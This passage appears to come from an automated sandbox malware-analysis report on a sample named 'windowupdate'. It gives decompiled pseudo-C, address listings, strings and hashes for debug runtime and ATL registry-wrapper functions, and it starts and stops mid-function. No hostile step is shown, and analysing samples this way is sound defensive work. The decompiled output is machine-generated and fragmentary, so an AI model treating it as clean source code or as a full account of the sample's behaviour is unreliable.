							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
							_v16 =  *_v12;
							_v16 = _v16 - 1;
							__eflags = _v16 - 3;
							if(_v16 > 3) {
								__eflags = 0;
								if(0 == 0) {
									_v20 = 0;
								} else {
									_v20 = 1;
								}
								_v24 = _v20;
								__eflags = _v24;
								if(__eflags == 0) {
									_t59 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
									_t82 = _t82 + 0x18;
									__eflags = _t59 - 1;
									if(_t59 == 1) {
										asm("int3");
									}
								}
								__eflags = _v24;
								if(_v24 != 0) {
									L22:
									_t55 = _v12 + 0x10;
									__eflags = _t55;
									_v12 = _t55;
									continue;
								} else {
									 *((intOrPtr*)(L00D82F70(0))) = 0x16;
									E00D82900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
									return 0;
								}
							}
							switch( *((intOrPtr*)(_v16 * 4 +  &M00D805F8))) {
								case 0:
									E00D64910(_v8 + 0x14);
									_t82 = _t82 + 4;
									goto L22;
								case 1:
									_v8 = _v8 + 0x14;
									__eax = E00D64B30(_v8 + 0x14);
									goto L22;
								case 2:
									_v8 = _v8 + 0x14;
									__eax = E00D64AF0(_v8 + 0x14);
									goto L22;
								case 3:
									_v8 = _v8 + 0x14;
									_v40 = E00D64B10(_v8 + 0x14);
									_v36 = __edx;
									goto L22;
							}
						}
						return 1;
					}
					goto L4;
				}
				return 0;
			}

















                      0x00d80478
                      0x00d80488
                      0x00d80491
                      0x00d80494
                      0x00d8049b
                      0x00d804a9
                      0x00000000
                      0x00d804a9
                      0x00d8049d
                      0x00d804a0
                      0x00d804a7
                      0x00d804b8
                      0x00d804be
                      0x00d804ca
                      0x00d804d1
                      0x00d804d7
                      0x00d804e5
                      0x00d804e8
                      0x00d804eb
                      0x00000000
                      0x00000000
                      0x00d804f7
                      0x00d804fa
                      0x00d80502
                      0x00d8050b
                      0x00d8050e
                      0x00d80512
                      0x00d80571
                      0x00d80573
                      0x00d8057e
                      0x00d80575
                      0x00d80575
                      0x00d80575
                      0x00d80588
                      0x00d8058b
                      0x00d8058f
                      0x00d805a9
                      0x00d805ae
                      0x00d805b1
                      0x00d805b4
                      0x00d805b6
                      0x00d805b6
                      0x00d805b4
                      0x00d805b7
                      0x00d805bb
                      0x00d805ea
                      0x00d804df
                      0x00d804df
                      0x00d804e2
                      0x00000000
                      0x00d805bd
                      0x00d805c2
                      0x00d805de
                      0x00000000
                      0x00d805e6
                      0x00d805bb
                      0x00d80517
                      0x00000000
                      0x00d80525
                      0x00d8052a
                      0x00000000
                      0x00000000
                      0x00d80535
                      0x00d80539
                      0x00000000
                      0x00000000
                      0x00d80549
                      0x00d8054d
                      0x00000000
                      0x00000000
                      0x00d8055d
                      0x00d80569
                      0x00d8056c
                      0x00000000
                      0x00000000
                      0x00d80517
                      0x00000000
                      0x00d805ef
                      0x00000000
                      0x00d804a7
                      0x00000000

                      Strings
                      • __crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> >::validate_and_upd, xrefs: 00D805D4
                      • ("Missing position in the format string", 0), xrefs: 00D80591, 00D805D9
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00D805A2, 00D805CF
                      • %ls, xrefs: 00D80596
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> >::validate_and_upd$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-53979339
                      • Opcode ID: 847018b6db0af4d44502862dfb56f98e30a53335b4ef3d13fef7decc8d1bfe63
                      • Instruction ID: 6895572d2aaef2d6d071de7ff6896a62cf2ae0082631a20f18e90700ef5b28b5
                      • Opcode Fuzzy Hash: 847018b6db0af4d44502862dfb56f98e30a53335b4ef3d13fef7decc8d1bfe63
                      • Instruction Fuzzy Hash: EF418EB0E40209EFCB44EF98C952AAEBBB1AF45308F2441A8D54167342D731EE09DFB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3BE20 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108threadCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E00D3BE20(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t30;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t46;
				void* _t48;
				intOrPtr _t61;
				void* _t65;
				void* _t68;
				void* _t69;

				_t66 = __esi;
				_t65 = __edi;
				_t48 = __ebx;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				if(_a4 == 0) {
					E00D324B0(__esi, 0xc0000005, 1);
				}
				if(_a8 == 0) {
					L4:
					_t30 = L00D84930(_t73, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x2094, 0, "%ls", L"pData != 0 && pObject != 0");
					_t69 = _t69 + 0x18;
					if(_t30 == 1) {
						asm("int3");
					}
					L6:
					if(_a8 == 0 || _a12 == 0) {
						E00D324B0(_t66, 0xc0000005, 1);
					}
					 *_a8 = _a12;
					_t67 = _t69;
					 *((intOrPtr*)(_a8 + 4)) = E00DC1520(GetCurrentThreadId(), _t69 - _t69);
					_t61 = _a4 + 4;
					E00D41D00(_t48,  &_v16, _t65, _t69, _t61, 0);
					_t35 = E00D41D90( &_v16, _t69);
					_t78 = _t35;
					if(_t35 >= 0) {
						 *((intOrPtr*)(_a8 + 8)) =  *((intOrPtr*)(_a4 + 0x1c));
						_t61 = _a4;
						 *((intOrPtr*)(_t61 + 0x1c)) = _a8;
						_t38 = E00D41D60( &_v16);
					} else {
						_push("ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData\n");
						_push(0);
						_push(E00D3F1E0(0xf23748));
						_push(E00D323B0( &_v28, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x209d));
						E00D323E0(_t48, _t65, _t67, _t78);
						_t69 = _t69 + 0x10;
						if(0 == 0) {
							_t46 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x209e, 0, "%ls", 0xde40dc);
							_t69 = _t69 + 0x18;
							if(_t46 == 1) {
								asm("int3");
							}
						}
						_t38 = E00D41D60( &_v16);
					}
					_push(_t61);
					E00DC14C0(_t68, 0xd3bf74);
					_t40 = _t38;
					return E00DC1520(_t40, _t68 - _t69 + 0x18);
				}
				_t73 = _a12;
				if(_a12 != 0) {
					goto L6;
				}
				goto L4;
			}



















                      0x00d3be20
                      0x00d3be20
                      0x00d3be20
                      0x00d3be2c
                      0x00d3be2f
                      0x00d3be32
                      0x00d3be35
                      0x00d3be38
                      0x00d3be3b
                      0x00d3be42
                      0x00d3be4b
                      0x00d3be4b
                      0x00d3be54
                      0x00d3be5c
                      0x00d3be74
                      0x00d3be79
                      0x00d3be7f
                      0x00d3be81
                      0x00d3be81
                      0x00d3be82
                      0x00d3be86
                      0x00d3be95
                      0x00d3be95
                      0x00d3bea0
                      0x00d3bea2
                      0x00d3beb4
                      0x00d3bebc
                      0x00d3bec3
                      0x00d3becb
                      0x00d3bed0
                      0x00d3bed2
                      0x00d3bf3e
                      0x00d3bf41
                      0x00d3bf47
                      0x00d3bf4d
                      0x00d3bed4
                      0x00d3bed4
                      0x00d3bed9
                      0x00d3bee5
                      0x00d3bef8
                      0x00d3bef9
                      0x00d3befe
                      0x00d3bf03
                      0x00d3bf1d
                      0x00d3bf22
                      0x00d3bf28
                      0x00d3bf2a
                      0x00d3bf2a
                      0x00d3bf28
                      0x00d3bf2e
                      0x00d3bf2e
                      0x00d3bf52
                      0x00d3bf5c
                      0x00d3bf61
                      0x00d3bf71
                      0x00d3bf71
                      0x00d3be56
                      0x00d3be5a
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00D3BEA4
                      • _Smanip.LIBCPMTD ref: 00D3BEF3
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3BF5C
                        • Part of subcall function 00D324B0: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 00D324C2
                      Strings
                      • ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData, xrefs: 00D3BED4
                      • pData != 0 && pObject != 0, xrefs: 00D3BE5C
                      • %ls, xrefs: 00D3BE61, 00D3BF0A
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3BE6D, 00D3BF16
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3BEEB
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckCurrentExceptionRaiseSmanipStackThreadVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData$pData != 0 && pObject != 0
                      • API String ID: 2312070509-3206224083
                      • Opcode ID: 907f69f7071d5274ff33dfa63433c1e7547ea46b94380ec841ab5bc9e7b6b2c8
                      • Instruction ID: dde803b43d320d69faea2ccb856967768cd2e0ff56f508456ed3087191bd7234
                      • Opcode Fuzzy Hash: 907f69f7071d5274ff33dfa63433c1e7547ea46b94380ec841ab5bc9e7b6b2c8
                      • Instruction Fuzzy Hash: 3431E774E40308AFDB10FF68DC43BAE7764EF50754F14811AFA19A7282E7B19A44CAB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D33200 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 106registrylibraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00D33200(intOrPtr __ecx, void* __esi, void* _a4, char* _a8, int _a12, char* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				void* _t35;
				long _t40;
				_Unknown_base(*)()* _t43;
				void* _t49;
				void* _t50;
				void* _t72;
				void* _t73;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if( *_v8 == 0) {
					__eflags =  *((intOrPtr*)(_v8 + 4));
					if(__eflags == 0) {
						L11:
						_t35 = 1;
						L12:
						return E00DC1520(_t35, _t72 - _t73 + 0xc);
					}
					_t40 = RegCreateKeyExA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					__eflags = _t73 - _t73;
					_t35 = E00DC1520(_t40, __eflags);
					goto L12;
				}
				_v12 = E00DC1520(GetModuleHandleA("Advapi32.dll"), _t73 - _t73);
				_t77 = _v12;
				if(_v12 == 0) {
					_t50 = L00D84930(_t77, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x27d, 0, "%ls", L"hAdvAPI32 != 0");
					_t73 = _t73 + 0x18;
					if(_t50 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					_t43 = GetProcAddress(_v12, "RegCreateKeyTransactedA");
					__eflags = _t73 - _t73;
					_v16 = E00DC1520(_t43, _t73 - _t73);
					__eflags = _v16;
					if(__eflags == 0) {
						goto L11;
					}
					_t49 = _v16(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_v8, 0);
					__eflags = _t73 - _t73;
					_t35 = E00DC1520(_t49, __eflags);
				} else {
					_t35 = 1;
				}
			}













                      0x00d33207
                      0x00d3320e
                      0x00d33215
                      0x00d3321c
                      0x00d33225
                      0x00d332de
                      0x00d332e2
                      0x00d33319
                      0x00d33319
                      0x00d3331f
                      0x00d3332c
                      0x00d3332c
                      0x00d3330a
                      0x00d33310
                      0x00d33312
                      0x00000000
                      0x00d33312
                      0x00d3323f
                      0x00d33242
                      0x00d33246
                      0x00d33260
                      0x00d33265
                      0x00d3326b
                      0x00d3326d
                      0x00d3326d
                      0x00d3326b
                      0x00d33272
                      0x00d33289
                      0x00d3328f
                      0x00d33296
                      0x00d33299
                      0x00d3329d
                      0x00000000
                      0x00d332d9
                      0x00d332cd
                      0x00d332d0
                      0x00d332d2
                      0x00d33274
                      0x00d33274
                      0x00d33274

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00D33232
                      • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00D33289
                      • RegCreateKeyExA.ADVAPI32(CCCCCCCC,CCCCCCCC,?,?,?,?,?,?,?), ref: 00D3330A
                      Strings
                      • hAdvAPI32 != 0, xrefs: 00D33248
                      • %ls, xrefs: 00D3324D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00D33259
                      • Advapi32.dll, xrefs: 00D3322D
                      • RegCreateKeyTransactedA, xrefs: 00D33280
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressCreateHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegCreateKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 1964897782-1911401746
                      • Opcode ID: de343d267e640871bfb8f7243af602025a741c1047bf3e842539b62eb483ff15
                      • Instruction ID: 2e4df8d3fa32e9ad4d2c4463bd336071c0c1aa02c2c49a590dab35fc48a836f4
                      • Opcode Fuzzy Hash: de343d267e640871bfb8f7243af602025a741c1047bf3e842539b62eb483ff15
                      • Instruction Fuzzy Hash: 75313A76A04119EFCB14EF8DD986FDE77B9AB48300F148248F909A7291D674DE80CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D330F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90registrylibraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00D330F0(intOrPtr __ecx, void* __esi, void* _a4, char* _a8, int _a12, int _a16, void** _a20) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				void* _t27;
				long _t31;
				_Unknown_base(*)()* _t34;
				void* _t39;
				void* _t40;
				void* _t56;
				void* _t57;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if( *_v8 == 0) {
					__eflags =  *((intOrPtr*)(_v8 + 4));
					if(__eflags == 0) {
						L11:
						_t27 = 1;
						L12:
						return E00DC1520(_t27, _t56 - _t57 + 0xc);
					}
					_t31 = RegOpenKeyExA(_a4, _a8, _a12, _a16, _a20);
					__eflags = _t57 - _t57;
					_t27 = E00DC1520(_t31, __eflags);
					goto L12;
				}
				_v12 = E00DC1520(GetModuleHandleA("Advapi32.dll"), _t57 - _t57);
				_t61 = _v12;
				if(_v12 == 0) {
					_t40 = L00D84930(_t61, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x255, 0, "%ls", L"hAdvAPI32 != 0");
					_t57 = _t57 + 0x18;
					if(_t40 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					_t34 = GetProcAddress(_v12, "RegOpenKeyTransactedA");
					__eflags = _t57 - _t57;
					_v16 = E00DC1520(_t34, _t57 - _t57);
					__eflags = _v16;
					if(__eflags == 0) {
						goto L11;
					}
					_t39 = _v16(_a4, _a8, _a12, _a16, _a20,  *_v8, 0);
					__eflags = _t57 - _t57;
					_t27 = E00DC1520(_t39, __eflags);
				} else {
					_t27 = 1;
				}
			}













                      0x00d330f7
                      0x00d330fe
                      0x00d33105
                      0x00d3310c
                      0x00d33115
                      0x00d331be
                      0x00d331c2
                      0x00d331e9
                      0x00d331e9
                      0x00d331ef
                      0x00d331fc
                      0x00d331fc
                      0x00d331da
                      0x00d331e0
                      0x00d331e2
                      0x00000000
                      0x00d331e2
                      0x00d3312f
                      0x00d33132
                      0x00d33136
                      0x00d33150
                      0x00d33155
                      0x00d3315b
                      0x00d3315d
                      0x00d3315d
                      0x00d3315b
                      0x00d33162
                      0x00d33179
                      0x00d3317f
                      0x00d33186
                      0x00d33189
                      0x00d3318d
                      0x00000000
                      0x00d331b9
                      0x00d331ad
                      0x00d331b0
                      0x00d331b2
                      0x00d33164
                      0x00d33164
                      0x00d33164

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00D33122
                      • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00D33179
                      • RegOpenKeyExA.ADVAPI32(CCCCCCCC,CCCCCCCC,?,?,?), ref: 00D331DA
                      Strings
                      • RegOpenKeyTransactedA, xrefs: 00D33170
                      • hAdvAPI32 != 0, xrefs: 00D33138
                      • %ls, xrefs: 00D3313D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00D33149
                      • Advapi32.dll, xrefs: 00D3311D
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressHandleModuleOpenProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegOpenKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 1337834000-1483138269
                      • Opcode ID: 28253d84e9cf378ecea0d21d9380b717e0679d0aa07e4fcb22b32ec8fae3e957
                      • Instruction ID: 9a1d0ad53d9bdcb88dd183a8f8582e036b479bff4d4cd06a60b827f282fb7596
                      • Opcode Fuzzy Hash: 28253d84e9cf378ecea0d21d9380b717e0679d0aa07e4fcb22b32ec8fae3e957
                      • Instruction Fuzzy Hash: CC315A72E00219AFCB20EF99D986F9E77B5AB48300F148148F905A7291D276DE80CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D34310 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 87registrylibraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 66%
                      			E00D34310(void** __ecx, void* __esi, char* _a4) {
				void** _v8;
				struct HINSTANCE__* _v12;
				long _t23;
				void* _t24;
				void* _t27;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				void* _t34;
				void* _t48;
				void* _t53;
				void* _t54;

				_t48 = __esi;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t56 =  *_v8;
					if( *_v8 == 0) {
						_t34 = L00D84930(_t56, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x167c, 0, "%ls", L"m_hKey != 0");
						_t54 = _t54 + 0x18;
						if(_t34 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				if(_v8[2] == 0) {
					__eflags =  *0xf23698 & 0x000000ff;
					if(( *0xf23698 & 0x000000ff) == 0) {
						_t28 = GetModuleHandleA("Advapi32.dll");
						__eflags = _t54 - _t54;
						_v12 = E00DC1520(_t28, _t54 - _t54);
						__eflags = _v12;
						if(_v12 != 0) {
							_t31 = GetProcAddress(_v12, "RegDeleteKeyExA");
							__eflags = _t54 - _t54;
							 *0xf215dc = E00DC1520(_t31, _t54 - _t54);
						}
						 *0xf23698 = 1;
					}
					__eflags =  *0xf215dc;
					if( *0xf215dc == 0) {
						_t23 = RegDeleteKeyA( *_v8, _a4);
						__eflags = _t54 - _t54;
						_t24 = E00DC1520(_t23, __eflags);
					} else {
						_t27 =  *0xf215dc( *_v8, _a4, _v8[1], 0);
						__eflags = _t54 - _t54;
						_t24 = E00DC1520(_t27, __eflags);
					}
				} else {
					_t24 = E00D33330(_v8[2], _t48,  *_v8, _a4);
				}
				return E00DC1520(_t24, _t53 - _t54 + 8);
			}














                      0x00d34310
                      0x00d34317
                      0x00d3431e
                      0x00d34325
                      0x00d34328
                      0x00d3432b
                      0x00d3432e
                      0x00d34348
                      0x00d3434d
                      0x00d34353
                      0x00d34355
                      0x00d34355
                      0x00d34353
                      0x00d34356
                      0x00d34361
                      0x00d34384
                      0x00d34386
                      0x00d3438f
                      0x00d34395
                      0x00d3439c
                      0x00d3439f
                      0x00d343a3
                      0x00d343b0
                      0x00d343b6
                      0x00d343bd
                      0x00d343bd
                      0x00d343c2
                      0x00d343c2
                      0x00d343c9
                      0x00d343d0
                      0x00d34402
                      0x00d34408
                      0x00d3440a
                      0x00d343d2
                      0x00d343e7
                      0x00d343ed
                      0x00d343ef
                      0x00d343ef
                      0x00d34363
                      0x00d34373
                      0x00d34373
                      0x00d3441d

                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00D3438F
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00D343B0
                      • RegDeleteKeyA.ADVAPI32(00000000,CCCCCCCC), ref: 00D34402
                      Strings
                      • %ls, xrefs: 00D34335
                      • Advapi32.dll, xrefs: 00D3438A
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D34341
                      • m_hKey != 0, xrefs: 00D34330
                      • RegDeleteKeyExA, xrefs: 00D343A7
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressDeleteHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$RegDeleteKeyExA$m_hKey != 0
                      • API String ID: 588496660-3303359461
                      • Opcode ID: b40d8f1529bca76ebdd86cf6e88d1aed70f8c7742325188b89e3c4516987935e
                      • Instruction ID: c6cb4866d1d30fcb5227338107a5067fcffdb4582940c58fcbdbc773df818c30
                      • Opcode Fuzzy Hash: b40d8f1529bca76ebdd86cf6e88d1aed70f8c7742325188b89e3c4516987935e
                      • Instruction Fuzzy Hash: C631B135E40219FFC710EB99D886F9D7BB5EB45300F288198E509AB291D774AE80DBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D33330 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 80registrylibraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00D33330(intOrPtr __ecx, void* __esi, void* _a4, char* _a8) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				void* _t21;
				long _t24;
				_Unknown_base(*)()* _t27;
				void* _t31;
				void* _t32;
				void* _t44;
				void* _t45;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if( *_v8 == 0) {
					__eflags =  *((intOrPtr*)(_v8 + 4));
					if(__eflags == 0) {
						L11:
						_t21 = 1;
						L12:
						return E00DC1520(_t21, _t44 - _t45 + 0xc);
					}
					_t24 = RegDeleteKeyA(_a4, _a8);
					__eflags = _t45 - _t45;
					_t21 = E00DC1520(_t24, __eflags);
					goto L12;
				}
				_v12 = E00DC1520(GetModuleHandleA("Advapi32.dll"), _t45 - _t45);
				_t49 = _v12;
				if(_v12 == 0) {
